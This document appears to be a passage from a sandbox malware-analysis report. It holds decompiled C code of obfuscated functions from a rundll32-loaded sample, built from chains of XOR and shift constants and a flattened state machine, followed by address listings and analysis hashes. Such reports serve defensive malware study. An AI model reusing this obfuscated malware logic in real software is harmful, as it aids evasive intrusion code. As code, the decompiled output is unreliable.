                                                                                                                      				_v332 = _v332 >> 0xe;
                                                                                                                      				_v332 = _v332 ^ 0x000613e8;
                                                                                                                      				_v260 = 0x3cc9c3;
                                                                                                                      				_v260 = _v260 + 0xa75b;
                                                                                                                      				_t946 = 0x61;
                                                                                                                      				_v260 = _v260 * 0x22;
                                                                                                                      				_v260 = _v260 ^ 0x082f3be2;
                                                                                                                      				_v268 = 0x4bcd23;
                                                                                                                      				_v268 = _v268 << 0xa;
                                                                                                                      				_v268 = _v268 >> 0xe;
                                                                                                                      				_v268 = _v268 ^ 0x0006002f;
                                                                                                                      				_v376 = 0x8e25da;
                                                                                                                      				_v376 = _v376 ^ 0x089338b1;
                                                                                                                      				_v376 = _v376 + 0x9f1e;
                                                                                                                      				_v376 = _v376 * 0x3e;
                                                                                                                      				_v376 = _v376 ^ 0xf734e37c;
                                                                                                                      				_v288 = 0x2c1a1a;
                                                                                                                      				_v288 = _v288 >> 1;
                                                                                                                      				_v288 = _v288 + 0x65f9;
                                                                                                                      				_v288 = _v288 ^ 0x001f182d;
                                                                                                                      				_v396 = 0x261c11;
                                                                                                                      				_v396 = _v396 * 0x4a;
                                                                                                                      				_v396 = _v396 + 0xfc66;
                                                                                                                      				_v396 = _v396 / _t1057;
                                                                                                                      				_v396 = _v396 ^ 0x003f9cf3;
                                                                                                                      				_v208 = 0x249f02;
                                                                                                                      				_v208 = _v208 * 0x35;
                                                                                                                      				_v208 = _v208 | 0x0bd65ece;
                                                                                                                      				_v208 = _v208 ^ 0x0fd6fbcb;
                                                                                                                      				_v236 = 0xa548a3;
                                                                                                                      				_v236 = _v236 ^ 0x6a8a42f2;
                                                                                                                      				_v236 = _v236 | 0x2dc08498;
                                                                                                                      				_v236 = _v236 ^ 0x6fec3552;
                                                                                                                      				_v244 = 0x5b801b;
                                                                                                                      				_v244 = _v244 >> 0x10;
                                                                                                                      				_v244 = _v244 / _t946;
                                                                                                                      				_v244 = _v244 ^ 0x0007501f;
                                                                                                                      				_v164 = 0x4d0087;
                                                                                                                      				_v164 = _v164 | 0x435fc395;
                                                                                                                      				_v164 = _v164 ^ 0x4354d65b;
                                                                                                                      				_v252 = 0x449e75;
                                                                                                                      				_v252 = _v252 | 0x5d5fe7f7;
                                                                                                                      				_v252 = _v252 ^ 0x5d579835;
                                                                                                                      				_v344 = 0x288ce5;
                                                                                                                      				_t1053 = 0xf59c021;
                                                                                                                      				_v344 = _v344 + 0xb994;
                                                                                                                      				_t1058 = 0xa6cb997;
                                                                                                                      				_v344 = _v344 + 0xffff4f41;
                                                                                                                      				_t947 = 0x7b;
                                                                                                                      				_v344 = _v344 * 0x4e;
                                                                                                                      				_v344 = _v344 ^ 0x0c50f765;
                                                                                                                      				_v212 = 0x44a004;
                                                                                                                      				_v212 = _v212 / _t947;
                                                                                                                      				_v212 = _v212 | 0x4d1b1380;
                                                                                                                      				_v212 = _v212 ^ 0x4d12f735;
                                                                                                                      				_v148 = 0xb7f79c;
                                                                                                                      				_v148 = _v148 | 0x3407a1ee;
                                                                                                                      				_v148 = _v148 ^ 0x34b718ff;
                                                                                                                      				_v220 = 0xe82bd0;
                                                                                                                      				_v220 = _v220 ^ 0xc89b583b;
                                                                                                                      				_t948 = 0x12;
                                                                                                                      				_v220 = _v220 / _t948;
                                                                                                                      				_v220 = _v220 ^ 0x0b283f5f;
                                                                                                                      				_v156 = 0x5af0c5;
                                                                                                                      				_v156 = _v156 + 0x13dc;
                                                                                                                      				_v156 = _v156 ^ 0x00588292;
                                                                                                                      				_v228 = 0xdd0fc1;
                                                                                                                      				_v228 = _v228 ^ 0x01435610;
                                                                                                                      				_t949 = 0x1f;
                                                                                                                      				_v228 = _v228 * 0x7e;
                                                                                                                      				_v228 = _v228 ^ 0xcbf716b5;
                                                                                                                      				_v124 = 0xd80e40;
                                                                                                                      				_v124 = _v124 ^ 0x653de0e6;
                                                                                                                      				_v124 = _v124 ^ 0x65e35353;
                                                                                                                      				_v132 = 0x5632b9;
                                                                                                                      				_v132 = _v132 + 0xffff4616;
                                                                                                                      				_v132 = _v132 ^ 0x0058fa24;
                                                                                                                      				_v204 = 0xa86aea;
                                                                                                                      				_v204 = _v204 ^ 0x5463a324;
                                                                                                                      				_v204 = _v204 + 0xffff5f95;
                                                                                                                      				_v204 = _v204 ^ 0x54cedf8e;
                                                                                                                      				_v364 = 0xe8e823;
                                                                                                                      				_v364 = _v364 + 0xffffb955;
                                                                                                                      				_v364 = _v364 + 0xffffe3ba;
                                                                                                                      				_v364 = _v364 ^ 0x9235047b;
                                                                                                                      				_v364 = _v364 ^ 0x92d6764f;
                                                                                                                      				_v280 = 0xb242c7;
                                                                                                                      				_v280 = _v280 + 0xd280;
                                                                                                                      				_v280 = _v280 | 0xe772c78b;
                                                                                                                      				_v280 = _v280 ^ 0xe7f56f66;
                                                                                                                      				_v240 = 0xa7072;
                                                                                                                      				_v240 = _v240 + 0x191d;
                                                                                                                      				_v240 = _v240 ^ 0x431e7c4c;
                                                                                                                      				_v240 = _v240 ^ 0x431912b5;
                                                                                                                      				_v104 = 0x3f68c3;
                                                                                                                      				_v104 = _v104 << 1;
                                                                                                                      				_v104 = _v104 ^ 0x00784a5e;
                                                                                                                      				_v108 = 0xb2f51d;
                                                                                                                      				_v108 = _v108 ^ 0x0119eef7;
                                                                                                                      				_v108 = _v108 ^ 0x01a6bc10;
                                                                                                                      				_v328 = 0xc750f0;
                                                                                                                      				_v328 = _v328 / _t949;
                                                                                                                      				_v328 = _v328 + 0x3c71;
                                                                                                                      				_v328 = _v328 ^ 0x000854e6;
                                                                                                                      				while(1) {
                                                                                                                      					L1:
                                                                                                                      					_t1030 = 0x5edbe80;
                                                                                                                      					_t950 = 0x530629d;
                                                                                                                      					_t878 = 0x9627218;
                                                                                                                      					do {
                                                                                                                      						while(1) {
                                                                                                                      							L2:
                                                                                                                      							_t1070 = _t927 - _t878;
                                                                                                                      							if(_t1070 <= 0) {
                                                                                                                      								break;
                                                                                                                      							}
                                                                                                                      							__eflags = _t927 - _t1058;
                                                                                                                      							if(__eflags == 0) {
                                                                                                                      								_push(_v252);
                                                                                                                      								_push(_v164);
                                                                                                                      								_push(0x341648);
                                                                                                                      								_t1059 = E0034AB66(_v236, _v244, __eflags);
                                                                                                                      								_v44 = _v368;
                                                                                                                      								_v40 = _v360;
                                                                                                                      								_v36 = _v352;
                                                                                                                      								_t883 =  *0x365c9c; // 0x0
                                                                                                                      								_t885 =  *0x365c9c; // 0x0
                                                                                                                      								_t1032 =  *0x365c9c; // 0x0
                                                                                                                      								_t887 = E00354016(_v344,  *((intOrPtr*)(_t1032 + 0x5c)), _v236, _v80, _t879, _v212, _v140, _v148, _v220, _t885 + 0x50, _v236,  &_v44, _v156,  *((intOrPtr*)(_t883 + 0x58)), _v228);
                                                                                                                      								_t1065 =  &(_t1065[0x10]);
                                                                                                                      								__eflags = _t887 - _v336;
                                                                                                                      								if(_t887 != _v336) {
                                                                                                                      									_t927 = 0x1936859;
                                                                                                                      								} else {
                                                                                                                      									_t927 = _t1053;
                                                                                                                      									_t1063 = 1;
                                                                                                                      								}
                                                                                                                      								E0034AE03(_v124, _v132, _v204, _t1059);
                                                                                                                      								L24:
                                                                                                                      								_t1030 = 0x5edbe80;
                                                                                                                      								_t950 = 0x530629d;
                                                                                                                      								_t1058 = 0xa6cb997;
                                                                                                                      								_t878 = 0x9627218;
                                                                                                                      								goto L25;
                                                                                                                      							}
                                                                                                                      							__eflags = _t927 - 0xe23336a;
                                                                                                                      							if(__eflags == 0) {
                                                                                                                      								_t927 = 0x66c3b1;
                                                                                                                      								continue;
                                                                                                                      							}
                                                                                                                      							__eflags = _t927 - _t1053;
                                                                                                                      							if(__eflags != 0) {
                                                                                                                      								goto L25;
                                                                                                                      							}
                                                                                                                      							E00347027(_v108, _v116, _v80, _v328);
                                                                                                                      							L18:
                                                                                                                      							return _t1063;
                                                                                                                      						}
                                                                                                                      						if(_t1070 == 0) {
                                                                                                                      							_push(_v308);
                                                                                                                      							_push(_v416);
                                                                                                                      							_push(0x341518);
                                                                                                                      							_t891 = E0034AB66(_v300, _v172, __eflags);
                                                                                                                      							_t1036 =  *0x365c9c; // 0x0
                                                                                                                      							__eflags = E0035FBCF(_v276, _t1036 + 0x5c, _v80, _v392, _v400, _v408, _t891, _v284, _v332, _v300,  &_v76) - _v384;
                                                                                                                      							_t927 =  ==  ? 0x530629d : _t1053;
                                                                                                                      							E0034AE03(_v260, _v268, _v376, _t891);
                                                                                                                      							_t1065 =  &(_t1065[0xe]);
                                                                                                                      							goto L24;
                                                                                                                      						}
                                                                                                                      						if(_t927 == 0x66c3b1) {
                                                                                                                      							_push(_v144);
                                                                                                                      							_push(_v84);
                                                                                                                      							_push(0x3415c8);
                                                                                                                      							_t897 = E0034AB66(_v216, _v136, __eflags);
                                                                                                                      							_push(_v388);
                                                                                                                      							_push(_v348);
                                                                                                                      							_push(0x341538);
                                                                                                                      							__eflags = E00350EDA(E0034AB66(_v232, _v272, __eflags), _v128, _v200, _t897,  &_v80, _v264, _v96) - _v324;
                                                                                                                      							_t927 =  ==  ? 0x5edbe80 : 0x7114309;
                                                                                                                      							E0034AE03(_v428, _v188, _v88, _t897);
                                                                                                                      							E0034AE03(_v424, _v180, _v316, _t898);
                                                                                                                      							_t1065 =  &(_t1065[0xf]);
                                                                                                                      							L9:
                                                                                                                      							_t1053 = 0xf59c021;
                                                                                                                      							goto L24;
                                                                                                                      						}
                                                                                                                      						if(_t927 == 0x1936859) {
                                                                                                                      							_t905 =  *0x365c9c; // 0x0
                                                                                                                      							E003468DE(_v364, _v280, _v240, _v104,  *((intOrPtr*)(_t905 + 0x58)));
                                                                                                                      							_t1065 =  &(_t1065[3]);
                                                                                                                      							_t927 = _t1053;
                                                                                                                      							while(1) {
                                                                                                                      								L1:
                                                                                                                      								_t1030 = 0x5edbe80;
                                                                                                                      								_t950 = 0x530629d;
                                                                                                                      								_t878 = 0x9627218;
                                                                                                                      								goto L2;
                                                                                                                      							}
                                                                                                                      						}
                                                                                                                      						if(_t927 == _t950) {
                                                                                                                      							_push(_t950);
                                                                                                                      							_push(_t950);
                                                                                                                      							_t967 =  *0x365c9c; // 0x0
                                                                                                                      							_t971 = E00353512( *((intOrPtr*)(_t967 + 0x5c)));
                                                                                                                      							_t911 =  *0x365c9c; // 0x0
                                                                                                                      							__eflags = _t971;
                                                                                                                      							_t927 =  !=  ? _t1058 : _t1053;
                                                                                                                      							 *((intOrPtr*)(_t911 + 0x58)) = _t971;
                                                                                                                      							goto L1;
                                                                                                                      						}
                                                                                                                      						_t1074 = _t927 - _t1030;
                                                                                                                      						if(_t927 != _t1030) {
                                                                                                                      							goto L25;
                                                                                                                      						}
                                                                                                                      						_push(_v192);
                                                                                                                      						_push(_v380);
                                                                                                                      						_push(0x341568);
                                                                                                                      						_t912 = E0034AB66(_v420, _v292, _t1074);
                                                                                                                      						_push(_v184);
                                                                                                                      						_t1055 = _t912;
                                                                                                                      						_t700 =  &_v120; // 0x784a5e
                                                                                                                      						_push( *_t700);
                                                                                                                      						_push(0x341618);
                                                                                                                      						_t913 = E0034AB66(_v356, _v196, _t1074);
                                                                                                                      						_v64 = _v176;
                                                                                                                      						_t915 = E0035BA68(_v372, _v168, _v100, _t1055, _v412);
                                                                                                                      						_v56 = _v56 & 0x00000000;
                                                                                                                      						_v60 = _t1055;
                                                                                                                      						_v52 = 1;
                                                                                                                      						_v68 = 2 + _t915 * 2;
                                                                                                                      						_v48 =  &_v68;
                                                                                                                      						_t918 = 0x20;
                                                                                                                      						_v76 = _t918;
                                                                                                                      						E00345C98(_v404, _v312, _t913, _v160,  &_v76,  &_v56, _v112, _v256,  &_v32, _t918, _v72, _v320);
                                                                                                                      						_t927 =  ==  ? 0x9627218 : 0xf59c021;
                                                                                                                      						E0034AE03(_v92, _v304, _v340, _t1055);
                                                                                                                      						E0034AE03(_v152, _v296, _v248, _t913);
                                                                                                                      						_t1065 =  &(_t1065[0x17]);
                                                                                                                      						goto L9;
                                                                                                                      						L25:
                                                                                                                      					} while (_t927 != 0x7114309);
                                                                                                                      					goto L18;
                                                                                                                      				}
                                                                                                                      			}
                                                                                                                      0x0034d629
                                                                                                                      0x0034d631
                                                                                                                      0x0034d636
                                                                                                                      0x0034d63e
                                                                                                                      0x0034d646
                                                                                                                      0x0034d64e
                                                                                                                      0x0034d656
                                                                                                                      0x0034d65b
                                                                                                                      0x0034d663
                                                                                                                      0x0034d66b
                                                                                                                      0x0034d676
                                                                                                                      0x0034d687
                                                                                                                      0x0034d68e
                                                                                                                      0x0034d699
                                                                                                                      0x0034d6a4
                                                                                                                      0x0034d6ad
                                                                                                                      0x0034d6b8
                                                                                                                      0x0034d6c3
                                                                                                                      0x0034d6d7
                                                                                                                      0x0034d6dc
                                                                                                                      0x0034d6e3
                                                                                                                      0x0034d6ee
                                                                                                                      0x0034d6f6
                                                                                                                      0x0034d6fe
                                                                                                                      0x0034d706
                                                                                                                      0x0034d70e
                                                                                                                      0x0034d724
                                                                                                                      0x0034d72b
                                                                                                                      0x0034d736
                                                                                                                      0x0034d741
                                                                                                                      0x0034d74c
                                                                                                                      0x0034d757
                                                                                                                      0x0034d762
                                                                                                                      0x0034d76a
                                                                                                                      0x0034d776
                                                                                                                      0x0034d779
                                                                                                                      0x0034d77d
                                                                                                                      0x0034d785
                                                                                                                      0x0034d78d
                                                                                                                      0x0034d798
                                                                                                                      0x0034d7a3
                                                                                                                      0x0034d7ae
                                                                                                                      0x0034d7b9
                                                                                                                      0x0034d7cf
                                                                                                                      0x0034d7d6
                                                                                                                      0x0034d7e1
                                                                                                                      0x0034d7ec
                                                                                                                      0x0034d7fe
                                                                                                                      0x0034d803
                                                                                                                      0x0034d80a
                                                                                                                      0x0034d815
                                                                                                                      0x0034d820
                                                                                                                      0x0034d831
                                                                                                                      0x0034d838
                                                                                                                      0x0034d843
                                                                                                                      0x0034d856
                                                                                                                      0x0034d85d
                                                                                                                      0x0034d868
                                                                                                                      0x0034d870
                                                                                                                      0x0034d874
                                                                                                                      0x0034d879
                                                                                                                      0x0034d87e
                                                                                                                      0x0034d886
                                                                                                                      0x0034d891
                                                                                                                      0x0034d8a4
                                                                                                                      0x0034d8ab
                                                                                                                      0x0034d8b6
                                                                                                                      0x0034d8c9
                                                                                                                      0x0034d8d0
                                                                                                                      0x0034d8d8
                                                                                                                      0x0034d8e5
                                                                                                                      0x0034d8f3
                                                                                                                      0x0034d8f8
                                                                                                                      0x0034d8fc
                                                                                                                      0x0034d904
                                                                                                                      0x0034d90c
                                                                                                                      0x0034d914
                                                                                                                      0x0034d91c
                                                                                                                      0x0034d921
                                                                                                                      0x0034d929
                                                                                                                      0x0034d92e
                                                                                                                      0x0034d936
                                                                                                                      0x0034d93e
                                                                                                                      0x0034d94d
                                                                                                                      0x0034d950
                                                                                                                      0x0034d95c
                                                                                                                      0x0034d960
                                                                                                                      0x0034d968
                                                                                                                      0x0034d978
                                                                                                                      0x0034d97c
                                                                                                                      0x0034d981
                                                                                                                      0x0034d989
                                                                                                                      0x0034d994
                                                                                                                      0x0034d9a7
                                                                                                                      0x0034d9a8
                                                                                                                      0x0034d9af
                                                                                                                      0x0034d9ba
                                                                                                                      0x0034d9c5
                                                                                                                      0x0034d9cd
                                                                                                                      0x0034d9d5
                                                                                                                      0x0034d9e0
                                                                                                                      0x0034d9e8
                                                                                                                      0x0034d9f0
                                                                                                                      0x0034d9fd
                                                                                                                      0x0034da01
                                                                                                                      0x0034da09
                                                                                                                      0x0034da14
                                                                                                                      0x0034da1b
                                                                                                                      0x0034da26
                                                                                                                      0x0034da31
                                                                                                                      0x0034da3e
                                                                                                                      0x0034da42
                                                                                                                      0x0034da52
                                                                                                                      0x0034da56
                                                                                                                      0x0034da5e
                                                                                                                      0x0034da71
                                                                                                                      0x0034da78
                                                                                                                      0x0034da83
                                                                                                                      0x0034da8e
                                                                                                                      0x0034da99
                                                                                                                      0x0034daa4
                                                                                                                      0x0034daaf
                                                                                                                      0x0034daba
                                                                                                                      0x0034dac5
                                                                                                                      0x0034dad6
                                                                                                                      0x0034dadd
                                                                                                                      0x0034dae8
                                                                                                                      0x0034daf3
                                                                                                                      0x0034dafe
                                                                                                                      0x0034db09
                                                                                                                      0x0034db14
                                                                                                                      0x0034db1f
                                                                                                                      0x0034db2c
                                                                                                                      0x0034db34
                                                                                                                      0x0034db39
                                                                                                                      0x0034db41
                                                                                                                      0x0034db46
                                                                                                                      0x0034db55
                                                                                                                      0x0034db58
                                                                                                                      0x0034db5c
                                                                                                                      0x0034db64
                                                                                                                      0x0034db7a
                                                                                                                      0x0034db81
                                                                                                                      0x0034db8c
                                                                                                                      0x0034db97
                                                                                                                      0x0034dba2
                                                                                                                      0x0034dbad
                                                                                                                      0x0034dbb8
                                                                                                                      0x0034dbc3
                                                                                                                      0x0034dbd5
                                                                                                                      0x0034dbda
                                                                                                                      0x0034dbe3
                                                                                                                      0x0034dbee
                                                                                                                      0x0034dbf9
                                                                                                                      0x0034dc04
                                                                                                                      0x0034dc0f
                                                                                                                      0x0034dc1a
                                                                                                                      0x0034dc2d
                                                                                                                      0x0034dc2e
                                                                                                                      0x0034dc35
                                                                                                                      0x0034dc40
                                                                                                                      0x0034dc4b
                                                                                                                      0x0034dc56
                                                                                                                      0x0034dc61
                                                                                                                      0x0034dc6c
                                                                                                                      0x0034dc77
                                                                                                                      0x0034dc82
                                                                                                                      0x0034dc8d
                                                                                                                      0x0034dc98
                                                                                                                      0x0034dca3
                                                                                                                      0x0034dcae
                                                                                                                      0x0034dcb6
                                                                                                                      0x0034dcbe
                                                                                                                      0x0034dcc6
                                                                                                                      0x0034dcce
                                                                                                                      0x0034dcd6
                                                                                                                      0x0034dce1
                                                                                                                      0x0034dcec
                                                                                                                      0x0034dcf7
                                                                                                                      0x0034dd02
                                                                                                                      0x0034dd0d
                                                                                                                      0x0034dd18
                                                                                                                      0x0034dd23
                                                                                                                      0x0034dd2e
                                                                                                                      0x0034dd39
                                                                                                                      0x0034dd40
                                                                                                                      0x0034dd4b
                                                                                                                      0x0034dd56
                                                                                                                      0x0034dd61
                                                                                                                      0x0034dd6c
                                                                                                                      0x0034dd7a
                                                                                                                      0x0034dd7e
                                                                                                                      0x0034dd86
                                                                                                                      0x0034dd8e
                                                                                                                      0x0034dd8e
                                                                                                                      0x0034dd8e
                                                                                                                      0x0034dd93
                                                                                                                      0x0034dd98
                                                                                                                      0x0034dd9d
                                                                                                                      0x0034dd9d
                                                                                                                      0x0034dd9d
                                                                                                                      0x0034dd9d
                                                                                                                      0x0034dd9f
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x0034e0f3
                                                                                                                      0x0034e0f5
                                                                                                                      0x0034e13e
                                                                                                                      0x0034e145
                                                                                                                      0x0034e15a
                                                                                                                      0x0034e167
                                                                                                                      0x0034e16d
                                                                                                                      0x0034e178
                                                                                                                      0x0034e18a
                                                                                                                      0x0034e191
                                                                                                                      0x0034e1a8
                                                                                                                      0x0034e1ce

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450510384.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450496928.0000000000340000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.450529337.0000000000365000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_340000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 8s$#$*>@$.v:$/$0aQX$R5o$SSe$SN$^JxL$fFV$q<$rp$A@
                                                                                                                      • API String ID: 0-3270405876
                                                                                                                      • Opcode ID: 502d0a9b5dc174be65b3efff4b01a5a9e32c485e4bb8bccec3db4fb19bc212e0
                                                                                                                      • Instruction ID: 1780dd2b739d524fa675609515fb0386da8083a83cdc2cc5bd617de2fe6baf39
                                                                                                                      • Opcode Fuzzy Hash: 502d0a9b5dc174be65b3efff4b01a5a9e32c485e4bb8bccec3db4fb19bc212e0
                                                                                                                      • Instruction Fuzzy Hash: 7392E1715093808FD3B9CF65C58AB8BBBE2FBC5304F10891DE59A8A260DBB19549CF53
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 91%
                                                                                                                      			E00356864(char __ecx, signed int __edx) {
                                                                                                                      				char _v128;
                                                                                                                      				char _v256;
                                                                                                                      				char _v288;
                                                                                                                      				signed int _v292;
                                                                                                                      				intOrPtr _v296;
                                                                                                                      				intOrPtr _v300;
                                                                                                                      				intOrPtr _v304;
                                                                                                                      				intOrPtr _v308;
                                                                                                                      				signed int _v312;
                                                                                                                      				signed int _v316;
                                                                                                                      				signed int _v320;
                                                                                                                      				signed int _v324;
                                                                                                                      				signed int _v328;
                                                                                                                      				signed int _v332;
                                                                                                                      				signed int _v336;
                                                                                                                      				signed int _v340;
                                                                                                                      				signed int _v344;
                                                                                                                      				signed int _v348;
                                                                                                                      				signed int _v352;
                                                                                                                      				signed int _v356;
                                                                                                                      				signed int _v360;
                                                                                                                      				signed int _v364;
                                                                                                                      				signed int _v368;
                                                                                                                      				signed int _v372;
                                                                                                                      				signed int _v376;
                                                                                                                      				unsigned int _v380;
                                                                                                                      				unsigned int _v384;
                                                                                                                      				signed int _v388;
                                                                                                                      				signed int _v392;
                                                                                                                      				signed int _v396;
                                                                                                                      				signed int _v400;
                                                                                                                      				signed int _v404;
                                                                                                                      				signed int _v408;
                                                                                                                      				signed int _v412;
                                                                                                                      				signed int _v416;
                                                                                                                      				signed int _v420;
                                                                                                                      				signed int _v424;
                                                                                                                      				signed int _v428;
                                                                                                                      				signed int _v432;
                                                                                                                      				signed int _v436;
                                                                                                                      				signed int _v440;
                                                                                                                      				signed int _v444;
                                                                                                                      				signed int _v448;
                                                                                                                      				signed int _v452;
                                                                                                                      				signed int _v456;
                                                                                                                      				signed int _v460;
                                                                                                                      				signed int _v464;
                                                                                                                      				unsigned int _v468;
                                                                                                                      				signed int _v472;
                                                                                                                      				signed int _v476;
                                                                                                                      				signed int _v480;
                                                                                                                      				signed int _v484;
                                                                                                                      				char _v488;
                                                                                                                      				signed int _v492;
                                                                                                                      				signed int _v496;
                                                                                                                      				signed int _v500;
                                                                                                                      				signed int _v504;
                                                                                                                      				signed int _v508;
                                                                                                                      				signed int _v512;
                                                                                                                      				unsigned int _v516;
                                                                                                                      				signed int _v520;
                                                                                                                      				signed int _v524;
                                                                                                                      				signed int _v528;
                                                                                                                      				signed int _v532;
                                                                                                                      				signed int _v536;
                                                                                                                      				signed int _t574;
                                                                                                                      				signed int _t578;
                                                                                                                      				signed int _t583;
                                                                                                                      				void* _t604;
                                                                                                                      				void* _t614;
                                                                                                                      				signed int _t616;
                                                                                                                      				int _t621;
                                                                                                                      				signed int _t623;
                                                                                                                      				signed int _t624;
                                                                                                                      				signed int _t628;
                                                                                                                      				intOrPtr* _t633;
                                                                                                                      				void* _t636;
                                                                                                                      				void* _t637;
                                                                                                                      				void* _t638;
                                                                                                                      				signed int _t654;
                                                                                                                      				void* _t686;
                                                                                                                      				void* _t687;
                                                                                                                      				signed int _t689;
                                                                                                                      				signed int _t703;
                                                                                                                      				signed int _t704;
                                                                                                                      				signed int _t705;
                                                                                                                      				signed int _t706;
                                                                                                                      				signed int _t707;
                                                                                                                      				signed int _t708;
                                                                                                                      				signed int _t709;
                                                                                                                      				signed int _t710;
                                                                                                                      				signed int _t711;
                                                                                                                      				signed int _t712;
                                                                                                                      				signed int _t713;
                                                                                                                      				signed int _t714;
                                                                                                                      				signed int _t715;
                                                                                                                      				void* _t719;
                                                                                                                      				void* _t722;
                                                                                                                      				void* _t723;
                                                                                                                      				void* _t724;
                                                                                                                      				signed int _t729;
                                                                                                                      				signed int* _t730;
                                                                                                                      				void* _t736;
                                                                                                                      
                                                                                                                      				_t730 =  &_v536;
                                                                                                                      				_v312 = __edx;
                                                                                                                      				_v488 = __ecx;
                                                                                                                      				_v292 = _v292 & 0x00000000;
                                                                                                                      				_v304 = 0xafedb;
                                                                                                                      				_v300 = 0x161b15;
                                                                                                                      				_v296 = 0xc4991c;
                                                                                                                      				_v520 = 0x229c01;
                                                                                                                      				_v520 = _v520 * 0x5c;
                                                                                                                      				_t723 = 0xff9e75d;
                                                                                                                      				_v520 = _v520 + 0xffff9f66;
                                                                                                                      				_t703 = 0xc;
                                                                                                                      				_v520 = _v520 / _t703;
                                                                                                                      				_v520 = _v520 ^ 0x01094ea5;
                                                                                                                      				_v532 = 0xceed0e;
                                                                                                                      				_v532 = _v532 << 3;
                                                                                                                      				_v532 = _v532 | 0xe74d27fb;
                                                                                                                      				_v532 = _v532 ^ 0xe772d72f;
                                                                                                                      				_v476 = 0xc446fa;
                                                                                                                      				_v476 = _v476 + 0xf6e0;
                                                                                                                      				_v476 = _v476 + 0x4782;
                                                                                                                      				_v476 = _v476 + 0xffffecbc;
                                                                                                                      				_v476 = _v476 ^ 0x00cc0886;
                                                                                                                      				_v336 = 0x190970;
                                                                                                                      				_t704 = 0x2e;
                                                                                                                      				_v336 = _v336 * 0x68;
                                                                                                                      				_v336 = _v336 ^ 0x0a2923c5;
                                                                                                                      				_v328 = 0x78e0eb;
                                                                                                                      				_v328 = _v328 + 0x488f;
                                                                                                                      				_v328 = _v328 ^ 0x00799c70;
                                                                                                                      				_v344 = 0x81e0f6;
                                                                                                                      				_v344 = _v344 << 5;
                                                                                                                      				_v344 = _v344 ^ 0x103feee2;
                                                                                                                      				_v468 = 0xdaa1d;
                                                                                                                      				_v468 = _v468 * 0x7d;
                                                                                                                      				_v468 = _v468 + 0xfffff9ad;
                                                                                                                      				_v468 = _v468 >> 0xb;
                                                                                                                      				_v468 = _v468 ^ 0x0000a0f1;
                                                                                                                      				_v500 = 0x314529;
                                                                                                                      				_t62 =  &_v500; // 0x314529
                                                                                                                      				_v500 =  *_t62 * 0x2f;
                                                                                                                      				_t64 =  &_v500; // 0x314529
                                                                                                                      				_v500 =  *_t64 * 0x58;
                                                                                                                      				_v500 = _v500 ^ 0x606cc451;
                                                                                                                      				_v500 = _v500 ^ 0x7c6b32c1;
                                                                                                                      				_v452 = 0xb84a45;
                                                                                                                      				_v452 = _v452 + 0x7128;
                                                                                                                      				_t705 = 0x77;
                                                                                                                      				_v452 = _v452 / _t704;
                                                                                                                      				_v452 = _v452 ^ 0x000855d5;
                                                                                                                      				_v320 = 0x670f1a;
                                                                                                                      				_v320 = _v320 + 0xc1b0;
                                                                                                                      				_v320 = _v320 ^ 0x00622c3e;
                                                                                                                      				_v528 = 0x36f841;
                                                                                                                      				_v528 = _v528 | 0xd9d6132d;
                                                                                                                      				_v528 = _v528 + 0xffff776d;
                                                                                                                      				_v528 = _v528 << 0xd;
                                                                                                                      				_v528 = _v528 ^ 0xce5fe5c5;
                                                                                                                      				_v444 = 0x9c7682;
                                                                                                                      				_v444 = _v444 ^ 0x90589f65;
                                                                                                                      				_v444 = _v444 * 0x27;
                                                                                                                      				_v444 = _v444 ^ 0x0df55b42;
                                                                                                                      				_v512 = 0x104d73;
                                                                                                                      				_v512 = _v512 / _t705;
                                                                                                                      				_v512 = _v512 ^ 0x3e9257a1;
                                                                                                                      				_v512 = _v512 | 0xb9bbbc7d;
                                                                                                                      				_v512 = _v512 ^ 0xbfb4ec53;
                                                                                                                      				_v428 = 0xbc5642;
                                                                                                                      				_v428 = _v428 ^ 0xe7847a8c;
                                                                                                                      				_t706 = 0x55;
                                                                                                                      				_v428 = _v428 * 0x7f;
                                                                                                                      				_v428 = _v428 ^ 0xb4dd412b;
                                                                                                                      				_v436 = 0x8f794f;
                                                                                                                      				_v436 = _v436 << 9;
                                                                                                                      				_v436 = _v436 / _t706;
                                                                                                                      				_v436 = _v436 ^ 0x00567a69;
                                                                                                                      				_v496 = 0x46853b;
                                                                                                                      				_v496 = _v496 + 0xffff90ed;
                                                                                                                      				_v496 = _v496 >> 5;
                                                                                                                      				_t707 = 0x67;
                                                                                                                      				_v496 = _v496 / _t707;
                                                                                                                      				_v496 = _v496 ^ 0x000cc5d9;
                                                                                                                      				_v372 = 0xd1254b;
                                                                                                                      				_v372 = _v372 << 7;
                                                                                                                      				_v372 = _v372 ^ 0x689f86f2;
                                                                                                                      				_v504 = 0x5d1a6;
                                                                                                                      				_v504 = _v504 + 0xffffc3f1;
                                                                                                                      				_v504 = _v504 ^ 0x7853fb4b;
                                                                                                                      				_v504 = _v504 | 0x0811a454;
                                                                                                                      				_v504 = _v504 ^ 0x78557827;
                                                                                                                      				_v376 = 0x40c0d3;
                                                                                                                      				_v376 = _v376 + 0xba7b;
                                                                                                                      				_v376 = _v376 ^ 0x0043f819;
                                                                                                                      				_v448 = 0x188995;
                                                                                                                      				_v448 = _v448 ^ 0x19c6d723;
                                                                                                                      				_v448 = _v448 + 0xffff6508;
                                                                                                                      				_v448 = _v448 ^ 0x19d0df3a;
                                                                                                                      				_v368 = 0xa08e58;
                                                                                                                      				_v368 = _v368 | 0xc4b17aa1;
                                                                                                                      				_v368 = _v368 ^ 0xc4b81ac3;
                                                                                                                      				_v492 = 0x5a5e24;
                                                                                                                      				_v492 = _v492 ^ 0x14ae01a0;
                                                                                                                      				_v492 = _v492 + 0xffffeac5;
                                                                                                                      				_v492 = _v492 + 0xffff378f;
                                                                                                                      				_v492 = _v492 ^ 0x14f310c0;
                                                                                                                      				_v460 = 0x25665c;
                                                                                                                      				_v460 = _v460 << 9;
                                                                                                                      				_v460 = _v460 + 0xb06;
